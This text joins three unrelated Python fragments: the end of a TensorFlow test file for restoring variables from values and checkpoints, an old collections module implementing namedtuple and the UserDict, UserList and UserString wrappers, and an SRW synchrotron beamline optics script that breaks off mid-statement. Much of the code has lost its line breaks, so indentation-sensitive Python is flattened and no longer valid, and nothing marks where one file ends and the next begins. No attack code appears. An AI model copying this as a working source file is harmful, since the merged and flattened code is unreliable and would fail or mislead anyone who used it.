      self.assertAllEqual(init_value1, var1)

  def testWithScopes(self):
    init_value0 = np.asarray([1.0, 3.0, 9.0]).reshape((1, 3, 1))
    init_value1 = np.asarray([2.0, 4.0, 6.0, 8.0]).reshape((2, 1, 2))

    with self.test_session() as sess:
      initializer = tf.truncated_normal_initializer(stddev=.1)

      with tf.variable_scope('my_model/my_layer0'):
        var0 = tf.contrib.framework.variables.variable(
            'my_var0', shape=[1, 3, 1], initializer=initializer)
      with tf.variable_scope('my_model/my_layer1'):
        var1 = tf.contrib.framework.variables.variable(
            'my_var1', shape=[2, 1, 2], initializer=initializer)

      # Keys are fully scoped variable names.
      var_names_to_values = {'my_model/my_layer0/my_var0': init_value0,
                             'my_model/my_layer1/my_var1': init_value1}
      assign_op, feed_dict = tf.contrib.framework.variables.assign_from_values(
          var_names_to_values)

      # Initialize the variables.
      sess.run(tf.initialize_all_variables())

      # Perform the assignment.
      sess.run(assign_op, feed_dict)

      # Request and test the variable values:
      var0, var1 = sess.run([var0, var1])
      self.assertAllEqual(init_value0, var0)
      self.assertAllEqual(init_value1, var1)


class AssignFromValuesFnTest(tf.test.TestCase):
  """Tests for assign_from_values_fn (returns an init_fn taking a session)."""

  def testNoScopes(self):
    init_value0 = np.asarray([1.0, 3.0, 9.0]).reshape((1, 3, 1))
    init_value1 = np.asarray([2.0, 4.0, 6.0, 8.0]).reshape((2, 1, 2))

    with self.test_session() as sess:
      initializer = tf.truncated_normal_initializer(stddev=.1)
      var0 = tf.contrib.framework.variable(
          'my_var0', shape=[1, 3, 1], initializer=initializer)
      var1 = tf.contrib.framework.variable(
          'my_var1', shape=[2, 1, 2], initializer=initializer)

      var_names_to_values = {'my_var0': init_value0, 'my_var1': init_value1}
      init_fn = tf.contrib.framework.assign_from_values_fn(var_names_to_values)

      # Initialize the variables.
      sess.run(tf.initialize_all_variables())

      # Perform the assignment.
      init_fn(sess)

      # Request and test the variable values:
      var0, var1 = sess.run([var0, var1])
      self.assertAllEqual(init_value0, var0)
      self.assertAllEqual(init_value1, var1)

  def testWithScopes(self):
    init_value0 = np.asarray([1.0, 3.0, 9.0]).reshape((1, 3, 1))
    init_value1 = np.asarray([2.0, 4.0, 6.0, 8.0]).reshape((2, 1, 2))

    with self.test_session() as sess:
      initializer = tf.truncated_normal_initializer(stddev=.1)

      with tf.variable_scope('my_model/my_layer0'):
        var0 = tf.contrib.framework.variable(
            'my_var0', shape=[1, 3, 1], initializer=initializer)
      with tf.variable_scope('my_model/my_layer1'):
        var1 = tf.contrib.framework.variable(
            'my_var1', shape=[2, 1, 2], initializer=initializer)

      var_names_to_values = {'my_model/my_layer0/my_var0': init_value0,
                             'my_model/my_layer1/my_var1': init_value1}
      init_fn = tf.contrib.framework.assign_from_values_fn(var_names_to_values)

      # Initialize the variables.
      sess.run(tf.initialize_all_variables())

      # Perform the assignment.
      init_fn(sess)

      # Request and test the variable values:
      var0, var1 = sess.run([var0, var1])
      self.assertAllEqual(init_value0, var0)
      self.assertAllEqual(init_value1, var1)


class AssignFromCheckpointTest(tf.test.TestCase):
  """Tests for assign_from_checkpoint restore-op generation."""

  def create_checkpoint_from_values(self, var_names_to_values,
                                    checkpoint_dir, global_step=None):
    """Creates a checkpoint from a mapping of name to values in model_dir.

    Args:
      var_names_to_values: a map from variable names to values.
      checkpoint_dir: the directory where the checkpoint will be saved.
      global_step: the global step used to save the checkpoint.

    Returns:
      the model_path to the checkpoint.
    """
    var_list = []
    # NOTE: a fresh graph/session so the checkpoint variables do not pollute
    # the test graph.
    with tf.Session('', graph=tf.Graph()) as sess:
      # Create a set of variables to save in the checkpoint.
      for var_name in var_names_to_values:
        var_value = var_names_to_values[var_name]
        var_list.append(tf.Variable(var_value, name=var_name))
      saver = tf.train.Saver(var_list)
      init_op = tf.initialize_variables(var_list)
      sess.run(init_op)
      # Save the initialized values in the file at 'checkpoint_dir'
      return saver.save(sess, checkpoint_dir, global_step=global_step)

  def testLoadExistingVariables(self):
    init_value0 = 10.0
    init_value1 = 20.0
    var_names_to_values = {'v0': init_value0, 'v1': init_value1}

    model_dir = os.path.join(self.get_temp_dir(), 'model')
    with self.test_session() as sess:
      model_path = self.create_checkpoint_from_values(var_names_to_values,
                                                      model_dir)
      var0 = tf.contrib.framework.variables.variable('my_var0', shape=[])
      var1 = tf.contrib.framework.variables.variable('my_var1', shape=[])

      # Checkpoint names ('v0','v1') map onto differently named variables.
      vars_to_restore = {'v0': var0, 'v1': var1}
      op, feed_dict = tf.contrib.framework.variables.assign_from_checkpoint(
          model_path, vars_to_restore)

      # Initialize the variables.
      sess.run(tf.initialize_all_variables())

      # Perform the assignment.
      sess.run(op, feed_dict)

      # Request and test the variable values:
      self.assertEqual(init_value0, var0.eval())
      self.assertEqual(init_value1, var1.eval())

  def testRaisesValueErrorIfAVariableIsntFound(self):
    init_value0 = 10.0
    init_value1 = 20.0
    var_names_to_values = {'v0': init_value0, 'v1': init_value1}

    model_dir = os.path.join(self.get_temp_dir(), 'model')
    with self.test_session():
      model_path = self.create_checkpoint_from_values(var_names_to_values,
                                                      model_dir)
      var0 = tf.contrib.framework.variables.variable('my_var0', shape=[])
      var1 = tf.contrib.framework.variables.variable('my_var1', shape=[])

      # 'v0_fake' is not present in the checkpoint.
      vars_to_restore = {'v0_fake': var0, 'v1': var1}

      with self.assertRaises(ValueError):
        tf.contrib.framework.variables.assign_from_checkpoint(model_path,
                                                              vars_to_restore)

  def testInitFromCheckpointWithScopes(self):
    init_value0 = np.asarray([1.0, 3.0, 9.0],
                             dtype=np.float32).reshape((1, 3, 1))
    init_value1 = np.asarray([2.0, 4.0, 6.0, 8.0],
                             dtype=np.float32).reshape((2, 1, 2))

    var_names_to_values = {'layer0/v0': init_value0, 'layer1/v1': init_value1}
    model_dir = os.path.join(self.get_temp_dir(), 'model')
    with self.test_session() as sess:
      model_path = self.create_checkpoint_from_values(var_names_to_values,
                                                      model_dir)
      with tf.variable_scope('my_model/my_layer0'):
        var0 = tf.contrib.framework.variables.variable('my_var0',
                                                       shape=init_value0.shape)
      with tf.variable_scope('my_model/my_layer1'):
        var1 = tf.contrib.framework.variables.variable('my_var1',
                                                       shape=init_value1.shape)

      vars_to_restore = {'layer0/v0': var0, 'layer1/v1': var1}
      op, feed_dict = tf.contrib.framework.variables.assign_from_checkpoint(
          model_path, vars_to_restore)

      # Initialize the variables.
      sess.run(tf.initialize_all_variables())

      # Perform the assignment.
sess.run(op, feed_dict) # Request and test the variable values: self.assertAllEqual(init_value0, var0.eval()) self.assertAllEqual(init_value1, var1.eval()) class AssignFromCheckpointFnTest(tf.test.TestCase): def create_checkpoint_from_values(self, var_names_to_values, checkpoint_dir, global_step=None): """Creates a checkpoint from a mapping of name to values in model_dir. Args: var_names_to_values: a map from variable names to values. checkpoint_dir: the directory where the checkpoint will be saved. global_step: the global step used to save the checkpoint. Returns: the model_path to the checkpoint. """ var_list = [] with tf.Session('', graph=tf.Graph()) as sess: # Create a set of variables to save in the checkpoint. for var_name in var_names_to_values: var_value = var_names_to_values[var_name] var_list.append(tf.Variable(var_value, name=var_name)) saver = tf.train.Saver(var_list) init_op = tf.initialize_variables(var_list) sess.run(init_op) # Save the initialized values in the file at 'checkpoint_dir' return saver.save(sess, checkpoint_dir, global_step=global_step) def testLoadExistingVariables(self): init_value0 = 10.0 init_value1 = 20.0 var_names_to_values = {'v0': init_value0, 'v1': init_value1} model_dir = os.path.join(self.get_temp_dir(), 'model') with self.test_session() as sess: model_path = self.create_checkpoint_from_values(var_names_to_values, model_dir) var0 = tf.contrib.framework.variable('my_var0', shape=[]) var1 = tf.contrib.framework.variable('my_var1', shape=[]) vars_to_restore = {'v0': var0, 'v1': var1} init_fn = tf.contrib.framework.assign_from_checkpoint_fn( model_path, vars_to_restore) # Initialize the variables. sess.run(tf.initialize_all_variables()) # Perform the assignment. 
init_fn(sess) # Request and test the variable values: self.assertEqual(init_value0, var0.eval()) self.assertEqual(init_value1, var1.eval()) def testLoadExistingVariablesDifferentShapeDefaultDoesNotAllowReshape(self): init_value0 = [[10.0, 11.0]] init_value1 = 20.0 var_names_to_values = {'v0': init_value0, 'v1': init_value1} model_dir = os.path.join(self.get_temp_dir(), 'model') with self.test_session() as sess: model_path = self.create_checkpoint_from_values(var_names_to_values, model_dir) var0 = tf.contrib.framework.variable('my_var0', shape=[2, 1]) var1 = tf.contrib.framework.variable('my_var1', shape=[]) vars_to_restore = {'v0': var0, 'v1': var1} init_fn = tf.contrib.framework.assign_from_checkpoint_fn( model_path, vars_to_restore) # Initialize the variables. sess.run(tf.initialize_all_variables()) # Perform the assignment. with self.assertRaises(tf.errors.InvalidArgumentError): init_fn(sess) def testLoadExistingVariablesDifferentShapeAllowReshape(self): init_value0 = [[10.0, 11.0]] init_value1 = 20.0 var_names_to_values = {'v0': init_value0, 'v1': init_value1} model_dir = os.path.join(self.get_temp_dir(), 'model') with self.test_session() as sess: model_path = self.create_checkpoint_from_values(var_names_to_values, model_dir) var0 = tf.contrib.framework.variable('my_var0', shape=[2, 1]) var1 = tf.contrib.framework.variable('my_var1', shape=[]) vars_to_restore = {'v0': var0, 'v1': var1} init_fn = tf.contrib.framework.assign_from_checkpoint_fn( model_path, vars_to_restore, reshape_variables=True) # Initialize the variables. sess.run(tf.initialize_all_variables()) # Perform the assignment. 
init_fn(sess) # Request and test the variable values: self.assertAllEqual(np.transpose(np.array(init_value0)), var0.eval()) self.assertEqual(init_value1, var1.eval()) def testNotFoundError(self): init_value0 = 10.0 init_value1 = 20.0 var_names_to_values = {'v0': init_value0, 'v1': init_value1} model_dir = os.path.join(self.get_temp_dir(), 'model') with self.test_session() as sess: model_path = self.create_checkpoint_from_values(var_names_to_values, model_dir) var0 = tf.contrib.framework.variable('my_var0', shape=[]) var1 = tf.contrib.framework.variable('my_var1', shape=[]) var2 = tf.contrib.framework.variable('my_var2', shape=[]) vars_to_restore = {'v0': var0, 'v1': var1, 'v2': var2} init_fn = tf.contrib.framework.assign_from_checkpoint_fn( model_path, vars_to_restore) # Initialize the variables. sess.run(tf.initialize_all_variables()) # Perform the assignment. with self.assertRaises(tf.errors.NotFoundError): init_fn(sess) def testMissingVariablesList(self): init_value0 = 10.0 init_value1 = 20.0 var_names_to_values = {'v0': init_value0, 'v1': init_value1} model_dir = os.path.join(self.get_temp_dir(), 'model') with self.test_session() as sess: model_path = self.create_checkpoint_from_values(var_names_to_values, model_dir) var0 = tf.contrib.framework.variable('v0', shape=[]) var1 = tf.contrib.framework.variable('v1', shape=[]) var2 = tf.contrib.framework.variable('v2', shape=[]) vars_to_restore = [var0, var1, var2] init_fn = tf.contrib.framework.assign_from_checkpoint_fn( model_path, vars_to_restore, ignore_missing_vars=True) # Initialize the variables. sess.run(tf.initialize_all_variables()) # Perform the assignment. 
init_fn(sess) # Request and test the variable values: self.assertEqual(init_value0, var0.eval()) self.assertEqual(init_value1, var1.eval()) def testMissingVariablesDict(self): init_value0 = 10.0 init_value1 = 20.0 var_names_to_values = {'v0': init_value0, 'v1': init_value1} model_dir = os.path.join(self.get_temp_dir(), 'model') with self.test_session() as sess: model_path = self.create_checkpoint_from_values(var_names_to_values, model_dir) var0 = tf.contrib.framework.variable('my_var0', shape=[]) var1 = tf.contrib.framework.variable('my_var1', shape=[]) var2 = tf.contrib.framework.variable('my_var2', shape=[]) vars_to_restore = {'v0': var0, 'v1': var1, 'v2': var2} init_fn = tf.contrib.framework.assign_from_checkpoint_fn( model_path, vars_to_restore, ignore_missing_vars=True) # Initialize the variables. sess.run(tf.initialize_all_variables()) # Perform the assignment. init_fn(sess) # Request and test the variable values: self.assertEqual(init_value0, var0.eval()) self.assertEqual(init_value1, var1.eval()) if __name__ == '__main__': tf.test.main()
__all__ = ['deque', 'defaultdict', 'namedtuple', 'UserDict', 'UserList',
            'UserString']

# For bootstrapping reasons, the collection ABCs are defined in _abcoll.py.
# They should however be considered an integral part of collections.py.
try:
    from _abcoll import *
    import _abcoll
    __all__ += _abcoll.__all__
except ImportError:
    # Newer CPython renamed the bootstrap ABC module to _collections_abc;
    # fall back so this module imports on both old and new interpreters.
    from _collections_abc import *
    import _collections_abc as _abcoll
    __all__ += _abcoll.__all__

from _collections import deque, defaultdict
from operator import itemgetter as _itemgetter
from keyword import iskeyword as _iskeyword
import sys as _sys

################################################################################
### namedtuple
################################################################################

def namedtuple(typename, field_names, verbose=False):
    """Returns a new subclass of tuple with named fields.

    >>> Point = namedtuple('Point', 'x y')
    >>> Point.__doc__                   # docstring for the new class
    'Point(x, y)'
    >>> p = Point(11, y=22)             # instantiate with positional args or keywords
    >>> p[0] + p[1]                     # indexable like a plain tuple
    33
    >>> x, y = p                        # unpack like a regular tuple
    >>> x, y
    (11, 22)
    >>> p.x + p.y                       # fields also accessable by name
    33
    >>> d = p._asdict()                 # convert to a dictionary
    >>> d['x']
    11
    >>> Point(**d)                      # convert from a dictionary
    Point(x=11, y=22)
    >>> p._replace(x=100)               # _replace() is like str.replace() but targets named fields
    Point(x=100, y=22)

    """

    # Parse and validate the field names.  Validation serves two purposes,
    # generating informative error messages and preventing template injection attacks.
    if isinstance(field_names, str):
        field_names = field_names.replace(',', ' ').split() # names separated by whitespace and/or commas
    field_names = tuple(map(str, field_names))
    for name in (typename,) + field_names:
        if not all(c.isalnum() or c == '_' for c in name):
            raise ValueError('Type names and field names can only contain alphanumeric characters and underscores: %r' % name)
        if _iskeyword(name):
            raise ValueError('Type names and field names cannot be a keyword: %r' % name)
        if name[0].isdigit():
            raise ValueError('Type names and field names cannot start with a number: %r' % name)
    seen_names = set()
    for name in field_names:
        if name.startswith('_'):
            raise ValueError('Field names cannot start with an underscore: %r' % name)
        if name in seen_names:
            raise ValueError('Encountered duplicate field name: %r' % name)
        seen_names.add(name)

    # Create and fill-in the class template
    numfields = len(field_names)
    argtxt = repr(field_names).replace("'", "")[1:-1]   # tuple repr without parens or quotes
    reprtxt = ', '.join('%s=%%r' % name for name in field_names)
    dicttxt = ', '.join('%r: t[%d]' % (name, pos) for pos, name in enumerate(field_names))
    template = '''class %(typename)s(tuple):
        '%(typename)s(%(argtxt)s)' \n
        __slots__ = () \n
        _fields = %(field_names)r \n
        def __new__(cls, %(argtxt)s):
            return tuple.__new__(cls, (%(argtxt)s)) \n
        @classmethod
        def _make(cls, iterable, new=tuple.__new__, len=len):
            'Make a new %(typename)s object from a sequence or iterable'
            result = new(cls, iterable)
            if len(result) != %(numfields)d:
                raise TypeError('Expected %(numfields)d arguments, got %%d' %% len(result))
            return result \n
        def __repr__(self):
            return '%(typename)s(%(reprtxt)s)' %% self \n
        def _asdict(t):
            'Return a new dict which maps field names to their values'
            return {%(dicttxt)s} \n
        def _replace(self, **kwds):
            'Return a new %(typename)s object replacing specified fields with new values'
            result = self._make(map(kwds.pop, %(field_names)r, self))
            if kwds:
                raise ValueError('Got unexpected field names: %%r' %% kwds.keys())
            return result \n
        def __getnewargs__(self):
            return tuple(self) \n\n''' % locals()
    for i, name in enumerate(field_names):
        template += '        %s = property(itemgetter(%d))\n' % (name, i)
    if verbose:
        print(template)

    # Execute the template string in a temporary namespace and
    # support tracing utilities by setting a value for frame.f_globals['__name__']
    namespace = dict(itemgetter=_itemgetter,
                     __name__='namedtuple_%s' % typename)
    try:
        exec(template, namespace)
    except SyntaxError as e:
        raise SyntaxError(e.msg + ':\n' + template) from e
    result = namespace[typename]

    # For pickling to work, the __module__ variable needs to be set to the frame
    # where the named tuple is created.  Bypass this step in enviroments where
    # sys._getframe is not defined (Jython for example).
    if hasattr(_sys, '_getframe'):
        result.__module__ = _sys._getframe(1).f_globals['__name__']

    return result


################################################################################
### UserDict
################################################################################

class UserDict(MutableMapping):
    """A dict-like wrapper that stores its contents in the 'data' attribute."""

    # Start by filling-out the abstract methods
    def __init__(self, dict=None, **kwargs):
        self.data = {}
        if dict is not None:
            self.update(dict)
        if len(kwargs):
            self.update(kwargs)

    def __len__(self):
        return len(self.data)

    def __getitem__(self, key):
        if key in self.data:
            return self.data[key]
        # Defer to a subclass-provided __missing__ hook, mirroring dict.
        if hasattr(self.__class__, "__missing__"):
            return self.__class__.__missing__(self, key)
        raise KeyError(key)

    def __setitem__(self, key, item):
        self.data[key] = item

    def __delitem__(self, key):
        del self.data[key]

    def __iter__(self):
        return iter(self.data)

    # Modify __contains__ to work correctly when __missing__ is present
    def __contains__(self, key):
        return key in self.data

    # Now, add the methods in dicts but not in MutableMapping
    def __repr__(self):
        return repr(self.data)

    def copy(self):
        if self.__class__ is UserDict:
            return UserDict(self.data.copy())
        import copy
        data = self.data
        try:
            # Temporarily detach 'data' so copy.copy does not duplicate it;
            # the contents are re-added via update() below.
            self.data = {}
            c = copy.copy(self)
        finally:
            self.data = data
        c.update(self)
        return c

    @classmethod
    def fromkeys(cls, iterable, value=None):
        d = cls()
        for key in iterable:
            d[key] = value
        return d


################################################################################
### UserList
################################################################################

class UserList(MutableSequence):
    """A more or less complete user-defined wrapper around list objects."""

    def __init__(self, initlist=None):
        self.data = []
        if initlist is not None:
            # XXX should this accept an arbitrary sequence?
            if type(initlist) == type(self.data):
                self.data[:] = initlist
            elif isinstance(initlist, UserList):
                self.data[:] = initlist.data[:]
            else:
                self.data = list(initlist)

    def __repr__(self):
        return repr(self.data)

    def __lt__(self, other):
        return self.data < self.__cast(other)

    def __le__(self, other):
        return self.data <= self.__cast(other)

    def __eq__(self, other):
        return self.data == self.__cast(other)

    def __ne__(self, other):
        return self.data != self.__cast(other)

    def __gt__(self, other):
        return self.data > self.__cast(other)

    def __ge__(self, other):
        return self.data >= self.__cast(other)

    def __cast(self, other):
        return other.data if isinstance(other, UserList) else other

    # NOTE: the Python 2 __cmp__ hook was removed here: it called the builtin
    # cmp(), which no longer exists in Python 3, so it could only raise
    # NameError.  The rich comparison methods above fully cover ordering.

    def __contains__(self, item):
        return item in self.data

    def __len__(self):
        return len(self.data)

    def __getitem__(self, i):
        return self.data[i]

    def __setitem__(self, i, item):
        self.data[i] = item

    def __delitem__(self, i):
        del self.data[i]

    def __add__(self, other):
        if isinstance(other, UserList):
            return self.__class__(self.data + other.data)
        elif isinstance(other, type(self.data)):
            return self.__class__(self.data + other)
        return self.__class__(self.data + list(other))

    def __radd__(self, other):
        if isinstance(other, UserList):
            return self.__class__(other.data + self.data)
        elif isinstance(other, type(self.data)):
            return self.__class__(other + self.data)
        return self.__class__(list(other) + self.data)

    def __iadd__(self, other):
        if isinstance(other, UserList):
            self.data += other.data
        elif isinstance(other, type(self.data)):
            self.data += other
        else:
            self.data += list(other)
        return self

    def __mul__(self, n):
        return self.__class__(self.data*n)
    __rmul__ = __mul__

    def __imul__(self, n):
        self.data *= n
        return self

    def append(self, item):
        self.data.append(item)

    def insert(self, i, item):
        self.data.insert(i, item)

    def pop(self, i=-1):
        return self.data.pop(i)

    def remove(self, item):
        self.data.remove(item)

    def count(self, item):
        return self.data.count(item)

    def index(self, item, *args):
        return self.data.index(item, *args)

    def reverse(self):
        self.data.reverse()

    def sort(self, *args, **kwds):
        self.data.sort(*args, **kwds)

    def extend(self, other):
        if isinstance(other, UserList):
            self.data.extend(other.data)
        else:
            self.data.extend(other)


################################################################################
### UserString
################################################################################

class UserString(Sequence):
    """A str-like wrapper that stores its contents in the 'data' attribute."""

    def __init__(self, seq):
        if isinstance(seq, str):
            self.data = seq
        elif isinstance(seq, UserString):
            self.data = seq.data[:]
        else:
            self.data = str(seq)

    def __str__(self): return str(self.data)
    def __repr__(self): return repr(self.data)
    def __int__(self): return int(self.data)
    def __long__(self): return int(self.data)
    def __float__(self): return float(self.data)
    def __complex__(self): return complex(self.data)
    def __hash__(self): return hash(self.data)

    def __eq__(self, string):
        if isinstance(string, UserString):
            return self.data == string.data
        return self.data == string

    def __ne__(self, string):
        if isinstance(string, UserString):
            return self.data != string.data
        return self.data != string

    def __lt__(self, string):
        if isinstance(string, UserString):
            return self.data < string.data
        return self.data < string

    def __le__(self, string):
        if isinstance(string, UserString):
            return self.data <= string.data
        return self.data <= string

    def __gt__(self, string):
        if isinstance(string, UserString):
            return self.data > string.data
        return self.data > string

    def __ge__(self, string):
        if isinstance(string, UserString):
            return self.data >= string.data
        return self.data >= string

    def __contains__(self, char):
        if isinstance(char, UserString):
            char = char.data
        return char in self.data

    def __len__(self): return len(self.data)
    def __getitem__(self, index): return self.__class__(self.data[index])

    def __add__(self, other):
        if isinstance(other, UserString):
            return self.__class__(self.data + other.data)
        elif isinstance(other, str):
            return self.__class__(self.data + other)
        return self.__class__(self.data + str(other))

    def __radd__(self, other):
        if isinstance(other, str):
            return self.__class__(other + self.data)
        return self.__class__(str(other) + self.data)

    def __mul__(self, n):
        return self.__class__(self.data*n)
    __rmul__ = __mul__

    def __mod__(self, args):
        return self.__class__(self.data % args)

    # the following methods are defined in alphabetical order:
    def capitalize(self): return self.__class__(self.data.capitalize())

    def center(self, width, *args):
        return self.__class__(self.data.center(width, *args))

    def count(self, sub, start=0, end=_sys.maxsize):
        if isinstance(sub, UserString):
            sub = sub.data
        return self.data.count(sub, start, end)

    def encode(self, encoding=None, errors=None): # XXX improve this?
        if encoding:
            if errors:
                return self.__class__(self.data.encode(encoding, errors))
            return self.__class__(self.data.encode(encoding))
        return self.__class__(self.data.encode())

    def endswith(self, suffix, start=0, end=_sys.maxsize):
        return self.data.endswith(suffix, start, end)

    def expandtabs(self, tabsize=8):
        return self.__class__(self.data.expandtabs(tabsize))

    def find(self, sub, start=0, end=_sys.maxsize):
        if isinstance(sub, UserString):
            sub = sub.data
        return self.data.find(sub, start, end)

    def format(self, *args, **kwds):
        return self.data.format(*args, **kwds)

    def index(self, sub, start=0, end=_sys.maxsize):
        return self.data.index(sub, start, end)

    def isalpha(self): return self.data.isalpha()
    def isalnum(self): return self.data.isalnum()
    def isdecimal(self): return self.data.isdecimal()
    def isdigit(self): return self.data.isdigit()
    def isidentifier(self): return self.data.isidentifier()
    def islower(self): return self.data.islower()
    def isnumeric(self): return self.data.isnumeric()
    def isspace(self): return self.data.isspace()
    def istitle(self): return self.data.istitle()
    def isupper(self): return self.data.isupper()
    def join(self, seq): return self.data.join(seq)

    def ljust(self, width, *args):
        return self.__class__(self.data.ljust(width, *args))

    def lower(self): return self.__class__(self.data.lower())
    def lstrip(self, chars=None): return self.__class__(self.data.lstrip(chars))

    def partition(self, sep):
        return self.data.partition(sep)

    def replace(self, old, new, maxsplit=-1):
        if isinstance(old, UserString):
            old = old.data
        if isinstance(new, UserString):
            new = new.data
        return self.__class__(self.data.replace(old, new, maxsplit))

    def rfind(self, sub, start=0, end=_sys.maxsize):
        return self.data.rfind(sub, start, end)

    def rindex(self, sub, start=0, end=_sys.maxsize):
        return self.data.rindex(sub, start, end)

    def rjust(self, width, *args):
        return self.__class__(self.data.rjust(width, *args))

    def rpartition(self, sep):
        return self.data.rpartition(sep)

    def rstrip(self, chars=None):
        return self.__class__(self.data.rstrip(chars))

    def split(self, sep=None, maxsplit=-1):
        return self.data.split(sep, maxsplit)

    def rsplit(self, sep=None, maxsplit=-1):
        return self.data.rsplit(sep, maxsplit)

    def splitlines(self, keepends=0): return self.data.splitlines(keepends)

    def startswith(self, prefix, start=0, end=_sys.maxsize):
        return self.data.startswith(prefix, start, end)

    def strip(self, chars=None): return self.__class__(self.data.strip(chars))
    def swapcase(self): return self.__class__(self.data.swapcase())
    def title(self): return self.__class__(self.data.title())

    def translate(self, *args):
        return self.__class__(self.data.translate(*args))

    def upper(self): return self.__class__(self.data.upper())
    def zfill(self, width): return self.__class__(self.data.zfill(width))


################################################################################
### Simple tests
################################################################################

if __name__ == '__main__':
    # verify that instances can be pickled
    from pickle import loads, dumps
    Point = namedtuple('Point', 'x, y', True)
    p = Point(x=10, y=20)
    assert p == loads(dumps(p))

    # test and demonstrate ability to override methods
    class Point(namedtuple('Point', 'x y')):
        __slots__ = ()
        @property
        def hypot(self):
            return (self.x ** 2 + self.y ** 2) ** 0.5
        def __str__(self):
            return 'Point: x=%6.3f y=%6.3f hypot=%6.3f' % (self.x, self.y, self.hypot)

    for p in Point(3, 4), Point(14, 5/7.):
        print (p)

    class Point(namedtuple('Point', 'x y')):
        'Point class with optimized _make() and _replace() without error-checking'
        __slots__ = ()
        _make = classmethod(tuple.__new__)
        def _replace(self, _map=map, **kwds):
            return self._make(_map(kwds.get, ('x', 'y'), self))

    print(Point(11, 22)._replace(x=100))

    Point3D = namedtuple('Point3D', Point._fields + ('z',))
    print(Point3D.__doc__)

    import doctest
    TestResults = namedtuple('TestResults', 'failed attempted')
    print(TestResults(*doctest.testmod()))
#!/usr/bin/env python import os try: __IPYTHON__ import sys del sys.argv[1:] except: pass import srwl_bl import srwlib import srwlpy import srwl_uti_smp def set_optics(v=None): el = [] pp = [] names = ['S0', 'S0_HFM', 'HFM', 'HFM_S1', 'S1', 'S1_DCM_C1', 'DCM_C1', 'DCM_C2', 'DCM_C2_At_BPM1', 'At_BPM1', 'At_BPM1_Before_SSA', 'Before_SSA', 'SSA', 'SSA_AKB', 'AKB', 'AKB_KBV', 'KBV', 'KBV_KBH', 'KBH', 'KBH_At_Sample', 'At_Sample'] for el_name in names: if el_name == 'S0': # S0: aperture 33.1798m el.append(srwlib.SRWLOptA( _shape=v.op_S0_shape, _ap_or_ob='a', _Dx=v.op_S0_Dx, _Dy=v.op_S0_Dy, _x=v.op_S0_x, _y=v.op_S0_y, )) pp.append(v.op_S0_pp) elif el_name == 'S0_HFM': # S0_HFM: drift 33.1798m el.append(srwlib.SRWLOptD( _L=v.op_S0_HFM_L, )) pp.append(v.op_S0_HFM_pp) elif el_name == 'HFM': # HFM: sphericalMirror 34.2608m el.append(srwlib.SRWLOptMirSph( _r=v.op_HFM_r, _size_tang=v.op_HFM_size_tang, _size_sag=v.op_HFM_size_sag, _nvx=v.op_HFM_nvx, _nvy=v.op_HFM_nvy, _nvz=v.op_HFM_nvz, _tvx=v.op_HFM_tvx, _tvy=v.op_HFM_tvy, _x=v.op_HFM_x, _y=v.op_HFM_y, )) pp.append(v.op_HFM_pp) elif el_name == 'HFM_S1': # HFM_S1: drift 34.2608m el.append(srwlib.SRWLOptD( _L=v.op_HFM_S1_L, )) pp.append(v.op_HFM_S1_pp) elif el_name == 'S1': # S1: aperture 35.6678m el.append(srwlib.SRWLOptA( _shape=v.op_S1_shape, _ap_or_ob='a', _Dx=v.op_S1_Dx, _Dy=v.op_S1_Dy, _x=v.op_S1_x, _y=v.op_S1_y, )) pp.append(v.op_S1_pp) elif el_name == 'S1_DCM_C1': # S1_DCM_C1: drift 35.6678m el.append(srwlib.SRWLOptD( _L=v.op_S1_DCM_C1_L, )) pp.append(v.op_S1_DCM_C1_pp) elif el_name == 'DCM_C1': # DCM_C1: crystal 36.4488m crystal = srwlib.SRWLOptCryst( _d_sp=v.op_DCM_C1_d_sp, _psi0r=v.op_DCM_C1_psi0r, _psi0i=v.op_DCM_C1_psi0i, _psi_hr=v.op_DCM_C1_psiHr, _psi_hi=v.op_DCM_C1_psiHi, _psi_hbr=v.op_DCM_C1_psiHBr, _psi_hbi=v.op_DCM_C1_psiHBi, _tc=v.op_DCM_C1_tc, _ang_as=v.op_DCM_C1_ang_as, ) crystal.set_orient( _nvx=v.op_DCM_C1_nvx, _nvy=v.op_DCM_C1_nvy, _nvz=v.op_DCM_C1_nvz, _tvx=v.op_DCM_C1_tvx, _tvy=v.op_DCM_C1_tvy, ) 
el.append(crystal) pp.append(v.op_DCM_C1_pp) elif el_name == 'DCM_C2': # DCM_C2: crystal 36.4488m crystal = srwlib.SRWLOptCryst( _d_sp=v.op_DCM_C2_d_sp, _psi0r=v.op_DCM_C2_psi0r, _psi0i=v.op_DCM_C2_psi0i, _psi_hr=v.op_DCM_C2_psiHr, _psi_hi=v.op_DCM_C2_psiHi, _psi_hbr=v.op_DCM_C2_psiHBr, _psi_hbi=v.op_DCM_C2_psiHBi, _tc=v.op_DCM_C2_tc, _ang_as=v.op_DCM_C2_ang_as, ) crystal.set_orient( _nvx=v.op_DCM_C2_nvx, _nvy=v.op_DCM_C2_nvy, _nvz=v.op_DCM_C2_nvz, _tvx=v.op_DCM_C2_tvx, _tvy=v.op_DCM_C2_tvy, ) el.append(crystal) pp.append(v.op_DCM_C2_pp) elif el_name == 'DCM_C2_At_BPM1': # DCM_C2_At_BPM1: drift 36.4488m el.append(srwlib.SRWLOptD( _L=v.op_DCM_C2_At_BPM1_L, )) pp.append(v.op_DCM_C2_At_BPM1_pp) elif el_name == 'At_BPM1': # At_BPM1: watch 38.6904m pass elif el_name == 'At_BPM1_Before_SSA': # At_BPM1_Before_SSA: drift 38.6904m el.append(srwlib.SRWLOptD( _L=v.op_At_BPM1_Before_SSA_L, )) pp.append(v.op_At_BPM1_Before_SSA_pp) elif el_name == 'Before_SSA': # Before_SSA: watch 50.6572m pass elif el_name == 'SSA': # SSA: aperture 50.6572m el.append(srwlib.SRWLOptA( _shape=v.op_SSA_shape, _ap_or_ob='a', _Dx=v.op_SSA_Dx, _Dy=v.op_SSA_Dy, _x=v.op_SSA_x, _y=v.op_SSA_y, )) pp.append(v.op_SSA_pp) elif el_name == 'SSA_AKB': # SSA_AKB: drift 50.6572m el.append(srwlib.SRWLOptD( _L=v.op_SSA_AKB_L, )) pp.append(v.op_SSA_AKB_pp) elif el_name == 'AKB': # AKB: aperture 62.488m el.append(srwlib.SRWLOptA( _shape=v.op_AKB_shape, _ap_or_ob='a', _Dx=v.op_AKB_Dx, _Dy=v.op_AKB_Dy, _x=v.op_AKB_x, _y=v.op_AKB_y, )) pp.append(v.op_AKB_pp) elif el_name == 'AKB_KBV': # AKB_KBV: drift 62.488m el.append(srwlib.SRWLOptD( _L=v.op_AKB_KBV_L, )) pp.append(v.op_AKB_KBV_pp) elif el_name == 